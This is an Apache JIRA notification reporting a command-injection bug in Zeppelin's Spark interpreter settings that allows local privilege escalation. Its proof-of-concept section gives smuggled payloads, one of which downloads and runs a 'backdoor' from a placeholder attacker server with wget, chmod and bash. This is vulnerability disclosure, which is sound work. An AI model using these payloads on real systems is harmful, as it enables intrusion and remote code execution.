Alexey Sintsov created ZEPPELIN-4194:
----------------------------------------
Summary: System command injection via Spark Interpreter
configuration
Key: ZEPPELIN-4194
URL: https://issues.apache.org/jira/browse/ZEPPELIN-4194
Project: Zeppelin
Issue Type: Bug
Components: zeppelin-server
Affects Versions: 0.8.0
Reporter: Alexey Sintsov
Hi
We have found that system commands can be injected into Spark interpreter
settings (maybe other interpreter's settings are affected as well). This
injection will be executed when any Spark job will run.
This injection could be a security issue in environments where users have
permissions to change interpreter settings - then it lead to local privilege
escalation (normally user can execute notes with special user that is used for
interpreter, but injected commands will be executed with zeppelin user).
*PoC:*
(this example will also crash Spark jobs because command line is truncated)
spark.executor.memory=16g;touch${IFS%?}/tmp/test
or another example, in this case Spark jobs will be executed normally without
interruption
spark.driver.cores=2`\{wget,-O,/tmp/x,http://attacker_server:443/backdoor};\{chmod,0755,/tmp/x};\{bash,-c,/tmp/x}`
*Expectation:*
Parameters should be validated and filtered to prevent injections into the
command line.
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
